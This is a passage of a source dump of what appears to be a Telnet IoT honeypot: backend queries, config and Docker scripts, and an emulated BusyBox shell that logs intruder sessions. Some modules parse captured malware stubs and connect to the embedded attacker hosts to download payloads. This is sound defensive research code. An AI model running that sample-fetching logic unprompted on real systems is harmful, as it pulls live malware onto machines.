return ret
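The loop above distributes connection dates into fixed-size slots between `not_before` and `not_after`. The same bucketing, isolated into a standalone helper:

```python
import math

def bucket_dates(dates, not_before, not_after, granularity):
    # One [slot_start, count] pair per granularity-sized slot,
    # as built in get_network_history above.
    n = int(math.ceil((not_after - not_before) / granularity))
    ret = [[not_before + i * granularity, 0] for i in range(n)]
    for date in dates:
        ret[int((date - not_before) // granularity)][1] += 1
    return ret

assert bucket_dates([10, 15, 95], 0, 100, 50.0) == [[0.0, 2], [50.0, 1]]
```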
@db_wrapper
def get_biggest_networks_history(self, not_before, not_after):
MAX_NETWORKS = 4
n = self.session.query(Connection.network_id, func.count(Connection.network_id))
n = n.filter(and_(not_before < Connection.date, Connection.date < not_after))
# Filter out subsequent connections
n = n.outerjoin(conns_conns, Connection.id == conns_conns.c.id_last)
n = n.filter(conns_conns.c.id_last == None)
n = n.group_by(Connection.network_id)
n = n.order_by(func.count(Connection.network_id).desc())
data = n.all()
nb_networks = min(MAX_NETWORKS, len(data))
r = [0] * nb_networks
i = 0
for net in data[:nb_networks]:
network = self.session.query(Network).filter(Network.id == net[0]).first()
if (network != None):
r[i] = { "network": network.json(), "data": self.get_network_history(not_before, not_after, network.id) }
i += 1
return r
@db_wrapper
def get_connection_locations(self, not_before, not_after, network_id = None):
conns = self.session.query(Connection.lat, Connection.lon)
conns = conns.filter(and_(not_before < Connection.date, Connection.date < not_after))
if network_id:
conns = conns.filter(Connection.network_id == network_id)
conns = conns.all()
return conns
##
@db_wrapper
def get_malwares(self):
malwares = self.session.query(Malware).all()
return map(lambda m: m.json(), malwares)
##
@db_wrapper
def get_sample(self, sha256):
sample = self.session.query(Sample).filter(Sample.sha256 == sha256).first()
return sample.json(depth=1) if sample else None
@db_wrapper
def get_newest_samples(self):
samples = self.session.query(Sample).order_by(desc(Sample.date)).limit(16).all()
return map(lambda sample : sample.json(), samples)
##
@db_wrapper
def get_url(self, url):
url_obj = self.session.query(Url).filter(Url.url == url).first()
return url_obj.json(depth=1) if url_obj else None
@db_wrapper
def get_newest_urls(self):
urls = self.session.query(Url).order_by(desc(Url.date)).limit(16).all()
return map(lambda url : url.json(), urls)
##
@db_wrapper
def get_tag(self, name):
tag = self.session.query(Tag).filter(Tag.name == name).first()
return tag.json(depth=1) if tag else None
@db_wrapper
def get_tags(self):
tags = self.session.query(Tag).all()
return map(lambda tag : tag.json(), tags)
##
@db_wrapper
def get_country_stats(self):
stats = self.session.query(func.count(Connection.country), Connection.country).group_by(Connection.country).all()
return stats
##
@db_wrapper
def get_asn(self, asn):
asn_obj = self.session.query(ASN).filter(ASN.asn == asn).first()
if asn_obj:
return asn_obj.json(depth=1)
else:
return None
##
@db_wrapper
def connhash_tree_lines(self, lines, mincount):
length = 1 + lines * 4
othercount = 0
ret = {}
dbres = self.session.query(func.count(Connection.id),
func.substr(Connection.connhash, 0, length).label("c"),
Connection.stream, Connection.id).group_by("c").all()
for c in dbres:
count = c[0]
connhash = c[1]
if count > mincount:
ev_in = filter(lambda ev : ev["in"], json.loads(c[2]))
if len(ev_in) >= lines:
ret[connhash] = {
"count": c[0],
"connhash": connhash,
"text": ev_in[lines-1]["data"],
"childs": [],
"sample_id": c[3]
}
else:
othercount += count
return ret
@db_wrapper
def connhash_tree(self, layers):
tree = self.connhash_tree_lines(1, 10)
layer = tree
for lines in range(2,layers+1):
length = (lines-1) * 4
new_layer = self.connhash_tree_lines(lines, 0)
for connhash in new_layer:
connhash_old = connhash[:length]
if connhash_old in layer:
parent = layer[connhash_old]
parent["childs"].append(new_layer[connhash])
layer = new_layer
return tree
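The connhash tree above groups connections by growing 4-character prefixes of their command hash, so that layer n of the tree identifies sessions sharing their first n input lines. A minimal self-contained sketch of that grouping logic (plain strings and `Counter` instead of the SQL `substr`/`group_by` query; names are illustrative):

```python
# Sketch of the connhash prefix tree: each shell input line is assumed to
# contribute 4 hex characters to the connection hash, so a prefix of n*4
# characters identifies the first n commands of a session.
from collections import Counter

def connhash_tree(connhashes, layers, mincount=0):
    # Layer 1: group sessions by their first-command prefix.
    counts = Counter(h[:4] for h in connhashes)
    tree = {p: {"connhash": p, "count": c, "childs": []}
            for p, c in counts.items() if c > mincount}
    layer = tree
    for lines in range(2, layers + 1):
        length = lines * 4
        counts = Counter(h[:length] for h in connhashes if len(h) >= length)
        new_layer = {p: {"connhash": p, "count": c, "childs": []}
                     for p, c in counts.items()}
        # Attach each node to its parent, found by stripping the last 4 chars.
        for p, node in new_layer.items():
            parent = layer.get(p[:(lines - 1) * 4])
            if parent:
                parent["childs"].append(node)
        layer = new_layer
    return tree

hashes = ["aaaabbbb", "aaaabbbb", "aaaacccc", "ddddeeee"]
tree = connhash_tree(hashes, layers=2)
# "aaaa" ends up with two children, "dddd" with one.
```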
================================================
FILE: backend.py
================================================
import sys
import json
import traceback
from util.config import config
if len(sys.argv) > 1 and sys.argv[1] == "cleardb":
print "This will DELETE ALL DATA except users and cached asn data"
print "from the database currently used at:"
print ""
print " " + config.get("sql")
print ""
print "If you really want to DELETE ALL DATA, type 'delete' and press enter."
print ""
doit = sys.stdin.readline()
print ""
if doit.strip() != "delete":
print "ABORTED"
sys.exit(0)
from backend.db import delete_everything
delete_everything()
sys.exit(0)
# Importing via the backend is faster than replaying through the honeypot:
# Benchmark:
# CPU: Intel(R) Core(TM) i5-6500 CPU @ 3.20GHz
# Storage: Samsung SSD PM961
# File size: 7,3M
# SQLite:
# honeypot: 0m26,056s
# backend: 0m21,445s
# Mariadb:
# honeypot: 0m32,684s
# backend: 0m14,849s
if len(sys.argv) > 2 and sys.argv[1] == "import":
from backend.clientcontroller import ClientController
fname = sys.argv[2]
if len(sys.argv) > 3:
username = sys.argv[3]
else:
username = config.get("backend_user")
print "Importing " + fname + " as user " + username
with open(fname, "rb") as fp:
ctrl = ClientController()
for line in fp:
line = line.strip()
obj = json.loads(line)
if obj["ip"] != None and obj["date"] >= 1515899912:
print "conn " + obj["ip"] + " date " + str(obj["date"])
obj["backend_username"] = username
try:
ctrl.put_session(obj)
except:
print "Cannot Put Session"
print "----------------------------"
traceback.print_exc()
print "----------------------------"
print repr(obj)
sys.exit(0)
sys.exit(0)
if len(sys.argv) > 1:
print "Unknown action '" + sys.argv[1] + "'"
print "Available commands:"
print " import file.json : imports raw log file"
print " cleardb : deletes all data from db"
print "To simply start the backend, use no command at all"
sys.exit(0)
from backend.backend import run
run()
================================================
FILE: config.dist.yaml
================================================
# This is the default (distribution) config file
# For local configuration, please create and edit the file "config.yaml",
# this ensures your configuration survives an update via git pull
# This file is in YAML format
# If you don't know YAML, check https://de.wikipedia.org/wiki/YAML
# or just copy around existing entries
#############################################
# Global config
# used by both honeypot AND backend
# Credentials for authentication
# Used by honeypot only
# If not set, will be randomly generated
# If the backend cannot find a user with id == 1 in its database,
# it will generate one using these credentials (or autogenerated ones)
# backend_user: "CHANGEME"
# backend_pass: "CHANGEME"
##############################################
# Honeypot configuration
# Backend URL to which the honeypot will connect to store data
backend: "http://localhost:5000"
# Write raw data to a logfile; it can be imported into the backend db later
# includes everything EXCEPT sample contents
log_raw: null
# Save samples in sample_dir
log_samples: False
# Do not download any samples, use their url as content
# useful for debugging
fake_dl: false
# Telnet port
telnet_addr: ""
telnet_port: 2323
# Timeout in seconds for telnet session. Will expire if no bytes can be read from socket.
telnet_session_timeout: 60
# Maximum session length in seconds.
telnet_max_session_length: 120
# Minimum time in seconds between two connections from the same ip;
# connections arriving closer together will be refused
telnet_ip_min_time_between_connections: 30
#############################################
# Backend configuration
# sqlalchemy sql connect string
# examples:
# using sqlite: "sqlite:///database.db"
# using mysql: "mysql+mysqldb://USER:PASSWORD@MYSQL_HOST/DATABASE_NAME"
sql: "sqlite:///database.db"
# IP Address and port for http interface
http_port: 5000
http_addr: "127.0.0.1"
# Max connections to the sql db; may be restricted in some scenarios
max_db_conn: 1
# Directory in which samples are stored
sample_dir: "samples"
# Virustotal API key
vt_key: "GET_YOUR_OWN"
submit_to_vt: false
# Enable or Disable IP to ASN resolution
# Options: "none" | "offline" | "online"
# offline works by importing data from https://lite.ip2location.com/ - download must be done manually
# online works by querying origin.asn.cymru.com
ip_to_asn_resolution: "online"
cuckoo_enabled: false
cuckoo_url_base: "http://127.0.0.1:8090"
cuckoo_user: "user"
cuckoo_passwd: "passwd"
cuckoo_force: 0
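As the header comment says, settings in a local `config.yaml` take precedence over the `config.dist.yaml` defaults shown above. The actual loader lives in `util/config.py` (not shown in this excerpt); this is a hedged sketch of the override semantics using plain dicts, with illustrative names:

```python
# Minimal sketch of config override semantics: local values shadow
# distribution defaults. The real loader parses both YAML files.
def load_config(dist, local):
    merged = dict(dist)   # start from distribution defaults
    merged.update(local)  # local config.yaml settings win
    return merged

dist = {"telnet_port": 2323, "sql": "sqlite:///database.db"}
local = {"telnet_port": 23}
cfg = load_config(dist, local)
# telnet_port is overridden, sql keeps its default
```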
================================================
FILE: create_config.sh
================================================
#!/bin/bash
if [ -f config.yaml ]; then
echo "config.yaml already exists, aborting"
exit
fi
user=admin
pass=$(openssl rand -hex 16)
salt=$(openssl rand -hex 16)
echo "backend_user: $user" >> config.yaml
echo "backend_pass: $pass" >> config.yaml
echo "backend_salt: $salt" >> config.yaml
================================================
FILE: create_docker.sh
================================================
#!/bin/bash
if [ -f config.yaml ]; then
echo -n "config.yaml already exists, delete it? (Y/n): "
read force
if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then
rm config.yaml
else
echo aborting...
exit 1
fi
fi
if [ -f docker-compose.yml ]; then
echo -n "docker-compose.yml already exists, delete it? (Y/n): "
read force
if [ "$force" = "Y" ] || [ "$force" = "y" ] || [ "$force" = "" ]; then
rm docker-compose.yml
else
echo aborting...
exit 1
fi
fi
echo -n "DB: Use maria or sqlite? (maria/sqlite): "
read dbbackend
if [ "$dbbackend" != "maria" ] && [ "$dbbackend" != "sqlite" ]; then
echo "$dbbackend is not valid"
exit 1
fi
# Honeypot setup
echo " - Writing honeypot config"
user=admin
pass=$(openssl rand -hex 16)
salt=$(openssl rand -hex 16)
echo "backend_user: $user" >> config.yaml
echo "backend_pass: $pass" >> config.yaml
echo "backend_salt: $salt" >> config.yaml
echo "http_addr: \"0.0.0.0\"" >> config.yaml
echo "telnet_addr: \"0.0.0.0\"" >> config.yaml
echo "backend: \"http://backend:5000\"" >> config.yaml
echo "log_samples: True" >> config.yaml
echo "sample_dir: samples" >> config.yaml
# DB setup
if [ "$dbbackend" = "maria" ]; then
dbpass=$(openssl rand -hex 16)
sql="mysql+mysqldb://honey:$dbpass@honeydb/honey"
echo sql: \"$sql\" >> config.yaml
fi
# docker-compose setup
echo " - Writing docker-compose.yml"
cat << EOF >> docker-compose.yml
version: "3.7"
services:
honeypot:
depends_on:
- backend
image: telnet-iot-honeypot:hot
restart: always
entrypoint:
- python
- honeypot.py
ports:
- "2323:2323"
volumes:
- "./samples:/usr/src/app/samples"
backend:
build: .
image: telnet-iot-honeypot:hot
restart: always
entrypoint:
- python
- backend.py
ports:
- "5000:5000"
volumes:
- "./samples:/usr/src/app/samples"
EOF
if [ "$dbbackend" = "maria" ]; then
cat << EOF >> docker-compose.yml
depends_on:
- honeydb
honeydb:
image: mariadb:latest
restart: always
environment:
MYSQL_RANDOM_ROOT_PASSWORD: "yes"
MYSQL_DATABASE: honey
MYSQL_USER: honey
MYSQL_PASSWORD: $dbpass
EOF
fi
echo -n "Start honeypot using docker-compose now? d = start using daemon flag (Y/n/d): "
read runit
if [ "$runit" = "d" ]; then
sudo docker-compose up -d
elif [ "$runit" = "Y" ] || [ "$runit" = "y" ] || [ "$runit" = "" ]; then
sudo docker-compose up
fi
================================================
FILE: honeypot/__init__.py
================================================
================================================
FILE: honeypot/__main__.py
================================================
import signal
from telnet import Telnetd
from util.dbg import dbg
def signal_handler(signal, frame):
dbg('Ctrl+C')
srv.stop()
signal.signal(signal.SIGINT, signal_handler)
srv = Telnetd(2222)
srv.run()
================================================
FILE: honeypot/client.py
================================================
import requests
import requests.exceptions
import requests.auth
import json
from util.dbg import dbg
from util.config import config
class Client:
def __init__(self):
self.user = config.get("backend_user")
self.password = config.get("backend_pass")
self.url = config.get("backend")
self.auth = requests.auth.HTTPBasicAuth(self.user, self.password)
self.test_login()
def test_login(self):
try:
r = requests.get(self.url + "/connections", auth=self.auth, timeout=20.0)
except:
raise IOError("Cannot connect to backend")
try:
r = requests.get(self.url + "/login", auth=self.auth, timeout=20.0)
if r.status_code != 200:
raise IOError()
except:
raise IOError("Backend authentication test failed, check config.yaml")
def put_session(self, session, retry=True):
try:
r = requests.put(self.url + "/conns", auth=self.auth, json=session, timeout=20.0)
except requests.exceptions.RequestException:
dbg("Cannot connect to backend")
return []
if r.status_code == 200:
return r.json()
elif retry:
msg = r.raw.read()
dbg("Backend upload failed, retrying (" + str(msg) + ")")
return self.put_session(session, False)
else:
msg = r.raw.read()
raise IOError(msg)
def put_sample(self, data, retry=True):
try:
r = requests.post(self.url + "/file", auth=self.auth, data=data, timeout=20.0)
except requests.exceptions.RequestException:
dbg("Cannot connect to backend")
return
if r.status_code == 200:
return
elif retry:
msg = r.raw.read()
dbg("Backend upload failed, retrying (" + str(msg) + ")")
return self.put_sample(data, False)
else:
msg = r.raw.read()
raise IOError(msg)
================================================
FILE: honeypot/sampledb_client.py
================================================
import client
import time
import traceback
import os
import requests
import hashlib
import json
from util.dbg import dbg
from util.config import config
BACKEND = None
def get_backend():
global BACKEND
if BACKEND != None:
return BACKEND
elif config.get("backend", optional=True) != None:
BACKEND = client.Client()
return BACKEND
else:
return None
def sha256(data):
h = hashlib.sha256()
h.update(data)
return h.hexdigest()
class SampleRecord:
def __init__(self, url, name, info, data):
self.url = url
self.name = name
self.date = int(time.time())
self.info = info
self.data = data
if data:
self.sha256 = sha256(data)
self.length = len(data)
else:
self.sha256 = None
self.length = None
def json(self):
return {
"type": "sample",
"url": self.url,
"name": self.name,
"date": self.date,
"sha256": self.sha256,
"info": self.info,
"length": self.length
}
class SessionRecord:
def __init__(self):
self.back = get_backend()
self.logfile = config.get("log_raw", optional=True)
self.log_samples = config.get("log_samples", optional=True, default=False)
self.sample_dir = config.get("sample_dir", optional=not(self.log_samples))
self.urlset = {}
self.ip = None
self.user = None
self.password = None
self.date = None
self.urls = []
self.stream = []
def log_raw(self, obj):
if self.logfile != None:
with open(self.logfile, "ab") as fp:
fp.write(json.dumps(obj).replace("\n", "") + "\n")
def json(self):
return {
"type" : "connection",
"ip" : self.ip,
"user" : self.user,
"pass" : self.password,
"date" : self.date,
"stream" : self.stream,
"samples" : map(lambda sample: sample.json(), self.urls),
}
def addInput(self, text):
self.stream.append({
"in": True,
"ts": round((time.time() - self.date) * 1000) / 1000,
"data": text.decode('ascii', 'ignore')
})
def addOutput(self, text):
self.stream.append({
"in": False,
"ts": round((time.time() - self.date) * 1000) / 1000,
"data": text.decode('ascii', 'ignore')
})
def set_login(self, ip, user, password):
self.ip = ip
self.user = user
self.password = password
self.date = int(time.time())
def add_file(self, data, url=None, name=None, info=None):
if url == None:
shahash = sha256(data)
# Hack: must be unique somehow, so just use the hash ...
url = "telnet://" + self.ip + "/" + shahash[0:8]
if name == None:
name = url.split("/")[-1].strip()
sample = SampleRecord(url, name, info, data)
self.urlset[url] = sample
self.urls.append(sample)
def commit(self):
self.log_raw(self.json())
if self.log_samples:
for sample in self.urls:
if sample.data:
fp = open(self.sample_dir + "/" + sample.sha256, "wb")
fp.write(sample.data)
fp.close()
# Ignore connections without any input
if len(self.stream) > 1 and self.back != None:
upload_req = self.back.put_session(self.json())
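Each `log_raw()` call above appends one JSON object per line; these lines are what `backend.py import` later replays via `put_session`. A sketch of one such line's shape (all field values here are made up for illustration):

```python
import json

# Shape of one raw-log line as produced by SessionRecord.json() above.
# The import command in backend.py skips entries with a null "ip" or a
# "date" before 1515899912.
record = {
    "type": "connection",
    "ip": "198.51.100.7",
    "user": "root",
    "pass": "12345",
    "date": 1515899912,
    "stream": [{"in": True, "ts": 0.1, "data": "enable\n"}],
    "samples": [{"type": "sample", "url": "http://example.com/bot.sh",
                 "name": "bot.sh", "date": 1515899912,
                 "sha256": None, "info": None, "length": None}],
}
# Newlines are stripped so each record stays on a single line.
line = json.dumps(record).replace("\n", "") + "\n"
```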
================================================
FILE: honeypot/session.py
================================================
import re
import random
import time
import json
import traceback
import struct
import socket
import select
import errno
from util.dbg import dbg
from util.config import config
from sampledb_client import SessionRecord
from shell.shell import Env, run
MIN_FILE_SIZE = 128
PROMPT = " # "
class Session:
def __init__(self, output, remote_addr):
dbg("New Session")
self.output = output
self.remote_addr = remote_addr
self.record = SessionRecord()
self.env = Env(self.send_string)
self.env.listen("download", self.download)
# Files already committed
self.files = []
def login(self, user, password):
dbg("Session login: user=" + user + " password=" + password)
self.record.set_login(self.remote_addr, user, password)
self.send_string(PROMPT)
def download(self, data):
path = data["path"]
url = data["url"]
info = data["info"]
data = data["data"]
dbg("Downloaded " + url + " to " + path)
if data:
self.record.add_file(data, url=url, name=path, info=info)
self.files.append(path)
else:
self.record.add_file(None, url=url, name=path, info=info)
def found_file(self, path, data):
if path in self.files:
pass
else:
if len(data) > MIN_FILE_SIZE:
dbg("File created: " + path)
self.record.add_file(data, name=path)
else:
dbg("Ignore small file: " + path + " (" + str(len(data)) + ") bytes")
def end(self):
dbg("Session End")
for path in self.env.files:
self.found_file(path, self.env.files[path])
for (path, data) in self.env.deleted:
self.found_file(path, data)
self.record.commit()
def send_string(self, text):
self.record.addOutput(text)
self.output(text)
def shell(self, l):
self.record.addInput(l + "\n")
try:
tree = run(l, self.env)
except:
dbg("Could not parse \""+l+"\"")
self.send_string("sh: syntax error near unexpected token `" + " " + "'\n")
traceback.print_exc()
self.send_string(PROMPT)
================================================
FILE: honeypot/shell/__init__.py
================================================
================================================
FILE: honeypot/shell/commands/__init__.py
================================================
================================================
FILE: honeypot/shell/commands/base.py
================================================
import sys
import traceback
from binary import run_binary
class Proc:
procs = {}
@staticmethod
def register(name, obj):
Proc.procs[name] = obj
@staticmethod
def get(name):
if name in Proc.procs:
return Proc.procs[name]
else:
return None
class StaticProc(Proc):
def __init__(self, output, result=0):
self.output = output
self.result = result
def run(self, env, args):
env.write(self.output)
return self.result
class FuncProc(Proc):
def __init__(self, func):
self.func = func
def run(self, env, args):
env.write(self.func(args))
return 0
# Basic Procs
class Exec(Proc):
def run(self, env, args):
if len(args) == 0:
return 0
if args[0][0] == ">":
name = "true"
elif args[0].startswith("./"):
fname = args[0][2:]
fdata = env.readFile(fname)
if fdata == None:
env.write("sh: 1: ./" + fname + ": not found\n")
return 1
else:
run_binary(fdata, fname, args[1:], env)
return 0
else:
name = args[0]
args = args[1:]
# $path = /bin/
if name.startswith("/bin/"):
name = name[5:]
if Proc.get(name):
try:
return Proc.get(name).run(env, args)
except:
traceback.print_exc()
env.write("Segmentation fault\n")
return 1
else:
env.write(name + ": command not found\n")
return 1
class BusyBox(Proc):
def run(self, env, args):
if len(args) == 0:
env.write("""BusyBox v1.27.2 (Ubuntu 1:1.27.2-2ubuntu3) multi-call binary.
BusyBox is copyrighted by many authors between 1998-2015.
Licensed under GPLv2. See source distribution for detailed
copyright notices.
Usage: busybox [function [arguments]...]
Currently defined functions:
""" + " ".join(Proc.procs.keys()) + "\n\n")
return 0
name = args[0]
args = args[1:]
if Proc.get(name):
return Proc.get(name).run(env, args)
else:
env.write(name + ": applet not found\n")
return 1
class Cat(Proc):
def run(self, env, args):
fname = args[0]
string = env.readFile(fname)
if string != None:
env.write(string)
return 0
else:
env.write("cat: " + fname + ": No such file or directory\n")
return 1
class Echo(Proc):
def run(self, env, args):
opts = ""
if args and args[0].startswith("-"):
opts = args[0][1:]
args = args[1:]
string = " ".join(args)
if "e" in opts:
string = string.decode('string_escape')
env.write(string)
if not("n" in opts):
env.write("\n")
return 0
class Rm(Proc):
def run(self, env, args):
if args[0] in env.listfiles():
env.deleteFile(args[0])
return 0
else:
env.write("rm: cannot remove '" + args[0] + "': No such file or directory\n")
return 1
class Ls(Proc):
def run(self, env, args):
for f in env.listfiles().keys():
env.write(f + "\n")
return 0
class Dd(Proc):
def run(self, env, args):
infile = None
outfile = None
count = None
bs = 512
for a in args:
if a.startswith("if="):
infile = a[3:]
if a.startswith("of="):
outfile = a[3:]
if a.startswith("count="):
count = int(a[6:])
if a.startswith("bs="):
bs = int(a[3:])
if infile != None:
data = env.readFile(infile)
if count != None:
data = data[0:(count*bs)]
if outfile:
env.deleteFile(outfile)
env.writeFile(outfile, data)
else:
env.write(data)
env.write("""0+0 records in
0+0 records out
0 bytes copied, 0 s, 0,0 kB/s\n""")
return 0
class Cp(Proc):
def run(self, env, args):
infile = args[0]
outfile = args[1]
data = env.readFile(infile)
if data != None:
env.writeFile(outfile, data)
return 0
else:
env.write("cp: cannot stat '" + infile + "': No such file or directory\n")
return 1
Proc.register("cp", Cp())
Proc.register("ls", Ls())
Proc.register("cat", Cat())
Proc.register("dd", Dd())
Proc.register("rm", Rm())
Proc.register("echo", Echo())
Proc.register("busybox", BusyBox())
Proc.register("exec", Exec())
Proc.register("cd", StaticProc(""))
Proc.register("true", StaticProc(""))
Proc.register("chmod", StaticProc(""))
Proc.register("uname", StaticProc(""))
Proc.register(":", StaticProc(""))
Proc.register("ps", StaticProc(
""" PID TTY TIME CMD
6467 pts/0 00:00:00 sh
12013 pts/0 00:00:00 ps\n"""))
# Other files
from wget import Wget
from shell import Shell
# tftp disabled
#from tftp import Tftp
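The commands above all follow the same pattern: each handler registers a singleton under its command name in `Proc.procs`, and `Exec`/`BusyBox` dispatch by dictionary lookup. A minimal self-contained sketch of that registry pattern (`FakeEnv` stands in for the real `Env` from honeypot/shell/shell.py, which is not shown in this excerpt):

```python
# Minimal sketch of the Proc registry/dispatch pattern used by the
# fake shell: register handlers by name, dispatch by lookup.
class FakeEnv:
    def __init__(self):
        self.out = ""
    def write(self, s):
        self.out += s

procs = {}

def register(name, obj):
    procs[name] = obj

class Echo:
    def run(self, env, args):
        env.write(" ".join(args) + "\n")
        return 0  # shell exit status

register("echo", Echo())

env = FakeEnv()
status = procs["echo"].run(env, ["hello", "world"])
# env.out now holds "hello world\n" and status is 0
```

An unknown name simply misses the dict, which is where the real `Exec` emits "command not found".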
================================================
FILE: honeypot/shell/commands/binary.py
================================================
import socket
import struct
import select
def dbg(s):
print s
def run_binary(data, fname, args, env):
dbg("Parsing binary file " + fname + " (" + str(len(data)) + " bytes)")
socks = []
tuples = []
pos = 0
while True:
pos = data.find("\x02\x00", pos)
if pos == -1: break
sockaddr = data[pos:pos+8]
sockaddr = struct.unpack(">HHBBBB", sockaddr)
pos += 8
# Ignore ip addresses starting with 0 or >= 224 (multicast/reserved)
if (sockaddr[2] == 0 or sockaddr[2] >= 224):
continue
ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." + str(sockaddr[5])
port = sockaddr[1]
tuples.append((ip, port))
for addr in tuples:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(15)
s.setblocking(0)
s.connect_ex(addr)
socks.append(s)
dbg("Trying tcp://" + addr[0] + ":" + str(addr[1]))
except:
pass
goodsocket = None
data = None
url = None
while len(socks) > 0:
read, a, b = select.select(socks, [], [], 15)
if len(read) == 0: break
for s in read:
if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:
try:
s.setblocking(1)
data = s.recv(1024)
goodsocket = s
peer = s.getpeername()
url = "tcp://" + peer[0] + ":" + str(peer[1])
dbg("Connected to " + url)
break
except:
s.close()
socks.remove(s)
else:
s.close()
socks.remove(s)
if goodsocket != None:
break
for s in socks:
if s != goodsocket:
s.close()
if goodsocket == None:
dbg("Could not connect.\n")
#for addr in tuples:
# env.write(tuples[0] + ":" + tuples[1] + "\n")
return 1
while True:
r = goodsocket.recv(1024)
if r != "":
data += r
else:
break
goodsocket.close()
# Normally these stub downloaders will output to stdout
env.write(data)
env.action("download", {
"url": url,
"path": "(stdout)",
"info": "",
"data": data
})
return 0
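The scanner above looks for the two bytes `02 00` (the `AF_INET` family field of a `struct sockaddr_in` as stored little-endian) and unpacks the 8-byte structure as family, big-endian port, and four address octets. A quick demonstration of that parse on a hand-built example (address and port chosen for illustration):

```python
import struct

# 8-byte sockaddr_in fragment: family 02 00, port 0x1f90 (8080),
# then the four octets of 192.168.1.1.
raw = b"\x02\x00\x1f\x90\xc0\xa8\x01\x01"
family, port, a, b, c, d = struct.unpack(">HHBBBB", raw)
ip = "%d.%d.%d.%d" % (a, b, c, d)
# port == 8080, ip == "192.168.1.1"
```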
================================================
FILE: honeypot/shell/commands/cmd_util.py
================================================
from getopt import gnu_getopt, GetoptError
def easy_getopt(args, opt, longopts=[]):
optlist, args = gnu_getopt(args, opt, longopts)
optdict = {}
for item in optlist:
optdict[item[0]] = item[1]
return optdict, args
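`easy_getopt` above just flattens `gnu_getopt`'s option list into a dict, which is how the tftp command later checks for flags like `-g` and `-r`. A usage sketch with the same option string the tftp command uses:

```python
from getopt import gnu_getopt

# Same helper as cmd_util.easy_getopt: dict of options plus leftover args.
def easy_getopt(args, opt, longopts=[]):
    optlist, args = gnu_getopt(args, opt, longopts)
    return dict(optlist), args

# "l:" and "r:" take a value, "g"/"p" are bare flags.
opts, rest = easy_getopt(["-g", "-r", "bot.sh", "10.0.0.1"], "l:r:gpb:")
# opts == {"-g": "", "-r": "bot.sh"}, rest == ["10.0.0.1"]
```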
================================================
FILE: honeypot/shell/commands/shell.py
================================================
from base import Proc
class Shell(Proc):
def run(self, env, args):
from honeypot.shell.shell import run
if len(args) == 0:
env.write("Busybox built-in shell (ash)\n")
return 0
fname = args[0]
contents = env.readFile(fname)
if contents == None:
env.write("sh: 0: Can't open " + fname)
return 1
else:
shell = Proc.get("exec")
for line in contents.split("\n"):
line = line.strip()
line = line.split("#")[0]
run(line, env)
return 0
Proc.register("sh", Shell())
================================================
FILE: honeypot/shell/commands/shellcode.py
================================================
import socket
import struct
import select
from util.dbg import dbg
from base import Proc
class Shellcode():
def run(self, data):
dbg("Parsing stub downloader (" + str(len(data)) + " bytes)")
socks = []
tuples = []
pos = 0
while True:
pos = data.find("\x02\x00", pos)
if pos == -1: break
sockaddr = data[pos:pos+8]
sockaddr = struct.unpack(">HHBBBB", sockaddr)
ip = str(sockaddr[2]) + "." + str(sockaddr[3]) + "." + str(sockaddr[4]) + "." + str(sockaddr[5])
port = sockaddr[1]
tuples.append((ip, port))
pos += 8
for addr in tuples:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(15)
s.setblocking(0)
s.connect_ex(addr)
socks.append(s)
dbg("Trying tcp://" + addr[0] + ":" + str(addr[1]))
except:
pass
goodsocket = None
data = None
url = None
while len(socks) > 0:
read, a, b = select.select(socks, [], [], 15)
if len(read) == 0: break
for s in read:
if s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0:
try:
s.setblocking(1)
data = s.recv(1024)
goodsocket = s
peer = s.getpeername()
url = "tcp://" + peer[0] + ":" + str(peer[1])
dbg("Connected to " + url)
break
except:
s.close()
socks.remove(s)
else:
s.close()
socks.remove(s)
if goodsocket != None:
break
for s in socks:
if s != goodsocket:
s.close()
if goodsocket == None:
dbg("Could not connect to any addresses in binary.")
return
while True:
r = goodsocket.recv(1024)
if r != "":
data += r
else:
break
goodsocket.close()
self.record.add_file(data, url=url)
================================================
FILE: honeypot/shell/commands/tftp.py
================================================
#!/usr/bin/env python
import io
import traceback
from getopt import gnu_getopt, GetoptError
from tftpy import TftpClient
from cmd_util import easy_getopt
from base import Proc
from util.config import config
class DummyIO(io.RawIOBase):
def __init__(self):
self.data = ""
def write(self, s):
self.data += s
class StaticTftp(Proc):
def run(self, env, args):
Tftp().run(env, args)
class Tftp:
help = """BusyBox v1.22.1 (Ubuntu 1:1.22.0-15ubuntu1) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
"""
def run(self, env, args):
self.env = env
self.connected = False
self.chunks = 0
try:
opts, args = easy_getopt(args, "l:r:gpb:")
except GetoptError as e:
env.write("tftp: " + str(e) + "\n")
env.write(Tftp.help)
return
if len(args) == 0:
env.write(Tftp.help)
return
elif len(args) == 1:
host = args[0]
port = 69
if ":" in host:
parts = host.split(":")
host = parts[0]
port = int(parts[1])
else:
host = args[0]
port = int(args[1])
if "-p" in opts:
env.write("tftp: option 'p' not implemented\n")
return
if "-b" in opts:
env.write("tftp: option 'b' not implemented\n")
return
if "-r" in opts:
path = opts["-r"]
else:
env.write(Tftp.help)
return
if "-l" in opts:
fname = opts["-l"]
else:
fname = path
try:
data = self.download(host, port, path)
env.writeFile(fname, data)
env.action("download", {
"url": "tftp://" + host + ":" + str(port) + "/" + path,
"path": fname,
"info": None,
"data": data
})
self.env.write("\nFinished. Saved to " + fname + ".\n")
except:
env.write("tftp: timeout\n")
env.action("download", {
"url": "tftp://" + host + ":" + str(port) + "/" + path,
"path": fname,
"info": None,
"data": None
})
def download(self, host, port, fname):
if config.get("fake_dl", optional=True, default=False):
return str(hash(host + str(port) + fname))
output = DummyIO()
client = TftpClient(host, port)
self.env.write("Trying " + host + ":" + str(port) + " ... ")
client.download(fname, output, timeout=5, packethook=self.pkt)
return output.data
def pkt(self, data):
if not(self.connected):
self.env.write("OK\n")
self.connected = True
#if self.chunks % 60 == 0:
# self.env.write("\n")
self.chunks += 1
#self.env.write(".")
Proc.register("tftp", StaticTftp())
================================================
FILE: honeypot/shell/commands/wget.py
================================================
import requests
import traceback
import datetime
import urlparse
from util.config import config
from base import Proc
class Wget(Proc):
